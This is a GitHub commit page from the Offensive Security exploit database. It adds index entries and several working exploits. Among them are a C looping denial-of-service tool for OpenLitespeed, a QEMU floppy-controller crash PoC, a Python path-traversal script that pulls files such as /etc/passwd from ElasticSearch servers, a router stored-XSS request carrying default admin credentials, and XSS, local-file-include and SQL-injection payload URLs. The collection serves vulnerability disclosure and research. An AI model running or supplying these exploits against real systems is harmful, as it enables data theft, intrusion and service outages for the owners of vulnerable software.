Skip to content

Commit eb3be45

Browse files
author
Offensive Security
committed
DB: 2015-05-22
17 new exploits
1 parent 62ba41a commit eb3be45

18 files changed

Lines changed: 907 additions & 1 deletion

File tree

files.csv

Lines changed: 18 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -6985,7 +6985,7 @@ id,file,description,date,author,platform,type,port
69856985
7441,platforms/php/webapps/7441.txt,"joomla live chat (sql/proxy) Multiple Vulnerabilities",2008-12-12,jdc,php,webapps,0
69866986
7442,platforms/windows/remote/7442.txt,"TmaxSoft JEUS Alternate Data Streams File Disclosure Vulnerability",2008-12-12,"Simon Ryeo",windows,remote,0
69876987
7443,platforms/php/webapps/7443.txt,"FlexPHPNews 0.0.6 & PRO (Auth Bypass) SQL Injection Vulnerability",2008-12-14,Osirys,php,webapps,0
6988-
7444,platforms/php/webapps/7444.txt,"Simple Text-File Login script 1.0.6 - (DD/RFI) Multiple Vulnerabilities",2008-12-14,Osirys,php,webapps,0
6988+
7444,platforms/php/webapps/7444.txt,"Simple Text-File Login script (SiTeFiLo) 1.0.6 - (DD/RFI) Multiple Vulnerabilities",2008-12-14,Osirys,php,webapps,0
69896989
7445,platforms/asp/webapps/7445.txt,"Discussion Web 4 - Remote Database Disclosure Vulnerability",2008-12-14,Pouya_Server,asp,webapps,0
69906990
7446,platforms/asp/webapps/7446.txt,"ASPired2Quote (quote.mdb) Remote Database Disclosure Vulnerability",2008-12-14,Pouya_Server,asp,webapps,0
69916991
7447,platforms/asp/webapps/7447.txt,"ASP-DEV Internal E-Mail System (Auth Bypass) SQL Injection Vuln",2008-12-14,Pouya_Server,asp,webapps,0
@@ -33392,6 +33392,7 @@ id,file,description,date,author,platform,type,port
3339233392
37002,platforms/php/webapps/37002.txt,"Open Journal Systems (OJS) 2.3.6 /lib/pkp/lib/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/rfiles.php param Parameter Multiple Function Traversal Arbitrary File Manipulation",2012-03-21,"High-Tech Bridge",php,webapps,0
3339333393
37003,platforms/php/webapps/37003.txt,"WordPress Booking Calendar Contact Form 1.0.2 - Multiple vulnerabilities",2015-05-13,"i0akiN SEC-LABORATORY",php,webapps,0
3339433394
37004,platforms/php/webapps/37004.txt,"PHPCollab 2.5 - SQL Injection",2015-05-13,"Wad Deek",php,webapps,0
33395+
37005,platforms/hardware/webapps/37005.txt,"IPLINK IP-DL-801RT-B - (Url Filter Configuration Panel) Stored XSS",2015-05-13,"XoDiAK BlackHat",hardware,webapps,0
3339533396
37007,platforms/linux/remote/37007.txt,"AtMail 1.04 Multiple Security Vulnerabilities",2012-03-22,"Yury Maryshev",linux,remote,0
3339633397
37008,platforms/php/webapps/37008.txt,"Event Calendar PHP 'cal_year' Parameter Cross Site Scripting Vulnerability",2012-03-24,3spi0n,php,webapps,0
3339733398
37009,platforms/java/webapps/37009.xml,"Apache Struts 2.0 'XSLTResult.java' Remote Arbitrary File Upload Vulnerability",2012-03-23,voidloafer,java,webapps,0
@@ -33434,6 +33435,11 @@ id,file,description,date,author,platform,type,port
3343433435
37046,platforms/php/webapps/37046.txt,"osCMax 2.5 admin/new_attributes_include.php Multiple Parameter XSS",2012-04-04,"High-Tech Bridge SA",php,webapps,0
3343533436
37047,platforms/php/webapps/37047.html,"osCMax 2.5 admin/login.php username Parameter SQL Injection",2012-04-04,"High-Tech Bridge SA",php,webapps,0
3343633437
37048,platforms/php/webapps/37048.txt,"osCMax 2.5 admin/stats_monthly_sales.php status Parameter SQL Injection",2012-04-04,"High-Tech Bridge SA",php,webapps,0
33438+
37049,platforms/windows/local/37049.txt,"Microsoft Windows - Local Privilege Escalation (MS15-051)",2015-05-18,hfiref0x,windows,local,0
33439+
37051,platforms/linux/dos/37051.c,"OpenLitespeed 1.3.9 - Use After Free (DoS)",2015-05-18,"Denis Andzakovic",linux,dos,0
33440+
37052,platforms/windows/local/37052.c,"Windows - CNG.SYS Kernel Security Feature Bypass PoC (MS15-052)",2015-05-18,4B5F5F4B,windows,local,0
33441+
37053,platforms/multiple/dos/37053.c,"QEMU - Floppy Disk Controller (FDC) PoC",2015-05-18,"Marcus Meissner",multiple,dos,0
33442+
37054,platforms/php/webapps/37054.py,"ElasticSearch < 1.4.5 / < 1.5.2 - Path Transversal",2015-05-18,pandujar,php,webapps,0
3343733443
37055,platforms/php/webapps/37055.txt,"Forma LMS 1.3 Multiple PHP Object Injection Vulnerabilities",2015-05-18,"Filippo Roncari",php,webapps,80
3343833444
37056,platforms/windows/local/37056.py,"BulletProof FTP Client 2010 - Buffer Overflow (DEP Bypass)",2015-05-18,"Gabor Seljan",windows,local,0
3343933445
37057,platforms/ios/webapps/37057.txt,"Wireless Photo Transfer 3.0 iOS - File Inclusion Vulnerability",2015-05-18,Vulnerability-Lab,ios,webapps,80
@@ -33447,3 +33453,14 @@ id,file,description,date,author,platform,type,port
3344733453
37067,platforms/php/webapps/37067.txt,"WordPress FeedWordPress Plugin 2015.0426 - SQL Injection",2015-05-20,"Adrián M. F.",php,webapps,80
3344833454
37068,platforms/windows/dos/37068.py,"ZOC SSH Client Buffer Overflow Vulnerability (SEH)",2015-05-20,"Dolev Farhi",windows,dos,0
3344933455
37069,platforms/lin_x86/shellcode/37069.c,"Linux/x86 execve ""/bin/sh"" - shellcode 26 bytes",2015-05-20,"Reza Behzadpour",lin_x86,shellcode,0
33456+
37070,platforms/php/webapps/37070.txt,"WordPress Uploadify Integration Plugin 0.9.6 Multiple Cross Site Scripting Vulnerabilities",2012-04-06,waraxe,php,webapps,0
33457+
37071,platforms/php/webapps/37071.txt,"CitrusDB 2.4.1 Local File Include and SQL Injection Vulnerabilities",2012-04-09,wacky,php,webapps,0
33458+
37072,platforms/php/webapps/37072.txt,"Matterdaddy Market 1.1 Multiple SQL Injection Vulnerabilities",2012-04-10,"Chokri B.A",php,webapps,0
33459+
37073,platforms/php/webapps/37073.html,"BGS CMS 2.2.1 Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2012-04-11,LiquidWorm,php,webapps,0
33460+
37074,platforms/php/webapps/37074.txt,"WordPress WP Membership Plugin 1.2.3 - Multiple Vulnerabilities",2015-05-21,"Panagiotis Vagenas",php,webapps,0
33461+
37075,platforms/php/webapps/37075.txt,"All-in-One Event Calendar Plugin 1.4 for WordPress /wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php title Parameter XSS",2012-04-11,"High-Tech Bridge SA",php,webapps,0
33462+
37076,platforms/php/webapps/37076.txt,"All-in-One Event Calendar Plugin 1.4 for WordPress /wp-content/plugins/all-in-one-event-calendar/app/view/box_publish_button.php button_value Parameter XSS",2012-04-11,"High-Tech Bridge SA",php,webapps,0
33463+
37077,platforms/php/webapps/37077.txt,"All-in-One Event Calendar Plugin 1.4 for WordPress /wp-content/plugins/all-in-one-event-calendar/app/view/save_successful.php msg Parameter XSS",2012-04-11,"High-Tech Bridge SA",php,webapps,0
33464+
37078,platforms/php/webapps/37078.txt,"All-in-One Event Calendar Plugin 1.4 for WordPress /wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php Multiple Parameter XSS",2012-04-11,"High-Tech Bridge SA",php,webapps,0
33465+
37079,platforms/php/webapps/37079.txt,"Forma LMS 1.3 Multiple SQL Injection Vulnerabilities",2015-05-21,"Filippo Roncari",php,webapps,80
33466+
37080,platforms/php/webapps/37080.txt,"WordPress WP Symposium Plugin 15.1 SQL Injection Vulnerability",2015-05-21,"Hannes Trunde",php,webapps,80

platforms/hardware/webapps/37005.txt

Lines changed: 44 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,44 @@
1+
# Exploit Title: IPLINK IP-DL-801RT-B (Url Filter Configuration Panel)
2+
Stored XSS
3+
# Google Dork: N/A
4+
# Date: 13/05/2015
5+
# Exploit Author: Xodiak xodiak.blackhat@gmail.com
6+
# Vendor Homepage: http://iplink.com.tw
7+
# Software Link: N/A
8+
# Version: All Version
9+
# Tested on: Kali Linux
10+
# CVE : N/A
11+
#
12+
Interductions:
13+
A Stored XSS Vulnerability In Url Filter Configuration Panel Discovered.
14+
15+
If Any JavaScript Code Add In Form Can Open Ports , Enable UPNP , Disable
16+
Firewall ,Hijack Bowser By Beef And,etc..
17+
18+
This Can Harm System And Modem :)
19+
20+
POC:
21+
http://192.168.1.1/url_nokeyword.htm
22+
23+
GET /url_nokeyword.htm HTTP/1.1
24+
Host: 192.168.1.1
25+
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101
26+
Firefox/18.0
27+
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
28+
Accept-Language: en-US,en;q=0.5
29+
Accept-Encoding: gzip, deflate
30+
Referer: http://192.168.1.1/code.htm
31+
Authorization: Basic YWRtaW46YWRtaW4=
32+
Connection: keep-alive
33+
34+
HTTP/1.1 200 OK
35+
Server: Virtual Web 0.9
36+
Content-Length: 2690
37+
38+
39+
40+
===================
41+
Greetz :
42+
=-| Milad Hacking, Seravo BlackHat, AC3S , Ehsan Ice , Saeed.J0ker,Alireza
43+
Attacker,MMA Defacer,END3R
44+
Amir Avinny,Abzari,Ali.Yar.RM_MR,SHA13AH And All Of My Friends |-=

platforms/linux/dos/37051.c

Lines changed: 161 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,161 @@
1+
/*
2+
* Openlitespeed 1.3.9 Use After Free denial of service exploit.
3+
*
4+
* This exploit triggers a denial of service condition within the Openlitespeed web
5+
* server. This is achieved by sending a tampered request contain a large number (91)
6+
* of 'a: a' header rows. By looping this request, a memmove call within the HttpReq
7+
* class is triggered with a freed pointer, resulting in a reference to an invalid
8+
* memory location and thus a segmentation fault.
9+
*
10+
* UAF Request:
11+
* GET / HTTP/1.0
12+
* a: a
13+
* a: a
14+
* a: a
15+
* a: a
16+
* a: a
17+
* a: a
18+
* a: a
19+
* a: a
20+
* a: a
21+
* a: a
22+
* a: a
23+
* a: a
24+
* a: a
25+
* a: a
26+
* a: a
27+
* a: a
28+
* a: a
29+
* a: a
30+
* a: a
31+
* a: a
32+
* a: a
33+
* a: a
34+
* a: a
35+
* a: a
36+
* a: a
37+
* a: a
38+
* a: a
39+
* a: a
40+
* a: a
41+
* a: a
42+
* a: a
43+
* a: a
44+
* a: a
45+
* a: a
46+
* a: a
47+
* a: a
48+
* a: a
49+
* a: a
50+
* a: a
51+
* a: a
52+
* a: a
53+
* a: a
54+
* a: a
55+
* a: a
56+
* a: a
57+
* a: a
58+
* a: a
59+
* a: a
60+
* a: a
61+
* a: a
62+
* a: a
63+
* a: a
64+
* a: a
65+
* a: a
66+
* a: a
67+
* a: a
68+
* a: a
69+
* a: a
70+
* a: a
71+
* a: a
72+
* a: a
73+
* a: a
74+
* a: a
75+
* a: a
76+
* a: a
77+
* a: a
78+
* a: a
79+
* a: a
80+
* a: a
81+
* a: a
82+
* a: a
83+
* a: a
84+
* a: a
85+
* a: a
86+
* a: a
87+
* a: a
88+
* a: a
89+
* a: a
90+
* a: a
91+
* a: a
92+
* a: a
93+
* a: a
94+
* a: a
95+
* a: a
96+
* a: a
97+
* a: a
98+
* a: a
99+
* a: a
100+
* a: a
101+
* a: a
102+
* a: a
103+
*
104+
* The above request should be placed into a file name 'uafcrash' prior to running this
105+
* exploit code.
106+
*
107+
* Date: 24/03/2015
108+
* Author: Denis Andzakovic - Security-Assessment.com
109+
*
110+
*/
111+
112+
#include <stdio.h>
113+
#include <string.h>
114+
#include <unistd.h>
115+
#include <sys/socket.h>
116+
#include <arpa/inet.h>
117+
#include <errno.h>
118+
119+
extern int errno;
120+
121+
int main(int argc, char ** argv){
122+
FILE * fp;
123+
size_t len = 0;
124+
char * line;
125+
if((fp = fopen("uafcrash", "r")) == NULL){
126+
fprintf(stderr, "[!] Error: Could not open file uafcrash: %s", strerror(errno));
127+
return 1;
128+
}
129+
130+
char * host = "127.0.0.1";
131+
int port = 8088;
132+
int count = 0;
133+
int sock;
134+
struct sockaddr_in serv_addr;
135+
while(1){
136+
if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0){
137+
fprintf(stderr, "[!] Error: Could not create socket \n");
138+
return 1;
139+
}
140+
141+
serv_addr.sin_family = AF_INET;
142+
serv_addr.sin_port = htons(port);
143+
inet_pton(AF_INET, host, &serv_addr.sin_addr);
144+
145+
if(connect(sock, (struct sockaddr *)&serv_addr, sizeof(serv_addr))<0){
146+
fprintf(stderr, "[!] Error: Could not connect! Check for server crash! Total cases sent:%d\n", count);
147+
close(sock);
148+
return 1;
149+
}
150+
while ((getline(&line, &len, fp)) != -1){
151+
152+
write(sock, line, strlen(line));
153+
}
154+
155+
close(sock);
156+
rewind(fp);
157+
count++;
158+
}
159+
160+
return 42;
161+
}

platforms/multiple/dos/37053.c

Lines changed: 14 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,14 @@
1+
// Source: https://marc.info/?l=oss-security&m=143155206320935&w=2
2+
3+
#include <sys/io.h>
4+
5+
#define FIFO 0x3f5
6+
7+
int main() {
8+
int i;
9+
iopl(3);
10+
11+
outb(0x0a,0x3f5); /* READ ID */
12+
for (i=0;i<10000000;i++)
13+
outb(0x42,0x3f5); /* push */
14+
}

platforms/php/webapps/37054.py

Lines changed: 56 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,56 @@
1+
#!/usr/bin/python
2+
# Crappy PoC for CVE-2015-3337 - Reported by John Heasman of DocuSign
3+
# Affects all ElasticSearch versions prior to 1.5.2 and 1.4.5
4+
# Pedro Andujar || twitter: pandujar || email: @segfault.es || @digitalsec.net
5+
# Tested on default Linux (.deb) install /usr/share/elasticsearch/plugins/
6+
#
7+
# Source: https://github.com/pandujar/elasticpwn/
8+
9+
import socket, sys
10+
11+
print "!dSR ElasticPwn - for CVE-2015-3337\n"
12+
if len(sys.argv) <> 3:
13+
print "Ex: %s www.example.com /etc/passwd" % sys.argv[0]
14+
sys.exit()
15+
16+
port = 9200 # Default ES http port
17+
host = sys.argv[1]
18+
fpath = sys.argv[2]
19+
20+
def grab(plugin):
21+
socket.setdefaulttimeout(3)
22+
s = socket.socket()
23+
s.connect((host,port))
24+
s.send("GET /_plugin/%s/../../../../../..%s HTTP/1.0\n"
25+
"Host: %s\n\n" % (plugin, fpath, host))
26+
file = s.recv(2048)
27+
print " [*] Trying to retrieve %s:" % fpath
28+
if ("HTTP/1.0 200 OK" in file):
29+
print "\n%s" % file
30+
else:
31+
print "[-] File Not Found, No Access Rights or System Not Vulnerable"
32+
33+
def pfind(plugin):
34+
try:
35+
socket.setdefaulttimeout(3)
36+
s = socket.socket()
37+
s.connect((host,port))
38+
s.send("GET /_plugin/%s/ HTTP/1.0\n"
39+
"Host: %s\n\n" % (plugin, host))
40+
file = s.recv(16)
41+
print "[*] Trying to find plugin %s:" % plugin
42+
if ("HTTP/1.0 200 OK" in file):
43+
print "[+] Plugin found!"
44+
grab(plugin)
45+
sys.exit()
46+
else:
47+
print "[-] Not Found "
48+
except Exception, e:
49+
print "[-] Error connecting to %s: %s" % (host, e)
50+
sys.exit()
51+
52+
# Include more plugin names to check if they are installed
53+
pluginList = ['test','kopf', 'HQ', 'marvel', 'bigdesk', 'head']
54+
55+
for plugin in pluginList:
56+
pfind(plugin)

platforms/php/webapps/37070.txt

Lines changed: 46 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,46 @@
1+
source: http://www.securityfocus.com/bid/52944/info
2+
3+
Uploadify Integration plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
4+
5+
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
6+
7+
Uploadify Integration 0.9.6 is vulnerable; other prior versions may also be affected.
8+
9+
http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
10+
shortcode/index.php?inputname="><script>alert(String.fromCharCode(88,83,83))</script>
11+
12+
http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
13+
shortcode/index.php?buttontext="><script>alert(String.fromCharCode(88,83,83))</script>
14+
15+
http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
16+
shortcode/index.php?filetypeexts="><script>alert(String.fromCharCode(88,83,83))</script>
17+
18+
http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
19+
shortcode/index.php?filetypedesc="><script>alert(String.fromCharCode(88,83,83))</script>
20+
21+
http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
22+
shortcode/index.php?filesizelimit="><script>alert(String.fromCharCode(88,83,83))</script>
23+
24+
http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
25+
shortcode/index.php?uploadmode="><script>alert(String.fromCharCode(88,83,83))</script>
26+
27+
http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
28+
shortcode/index.php?metatype="><script>alert(String.fromCharCode(88,83,83))</script>
29+
30+
http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
31+
shortcode/index.php?parentid="><script>alert(String.fromCharCode(88,83,83))</script>
32+
33+
http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
34+
shortcode/index.php?path="><script>alert(String.fromCharCode(88,83,83))</script>
35+
36+
http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
37+
shortcode/index.php?url="><script>alert(String.fromCharCode(88,83,83))</script>
38+
39+
http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
40+
partials/file.php?fileid="><script>alert(String.fromCharCode(88,83,83))</script>
41+
42+
http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
43+
partials/file.php?inputname="><script>alert(String.fromCharCode(88,83,83))</script>
44+
45+
http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
46+
file/error.php?error="><script>alert(String.fromCharCode(88,83,83))</script>

platforms/php/webapps/37071.txt

Lines changed: 9 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,9 @@
1+
source: http://www.securityfocus.com/bid/52946/info
2+
3+
CitrusDB is prone to a local file-include vulnerability and an SQL-injection vulnerability.
4+
5+
An attacker can exploit these issues to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, and view and execute arbitrary local files within the context of the webserver.
6+
7+
CitrusDB 2.4.1 is vulnerable; other versions may also be affected.
8+
9+
http://www.example.com/lab/citrus-2.4.1/index.php?load=../../../../../etc/passwd%00&type=base

platforms/php/webapps/37072.txt

Lines changed: 11 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,11 @@
1+
source: http://www.securityfocus.com/bid/52970/info
2+
3+
Matterdaddy Market is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
4+
5+
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
6+
7+
Matterdaddy Market 1.1 is vulnerable; other versions may also be affected.
8+
9+
http://www.example.com/mdmarket/admin/controller.php?cat_name=1&cat_order=-1%27[SQL INJECTION]&add=Add+Category&op=newCategory
10+
11+
http://www.example.com/mdmarket/admin/controller.php?cat_name=-1%27[SQL INJECTION]&cat_order=1&add=Add+Category&op=newCategory

0 commit comments

Comments
 (0)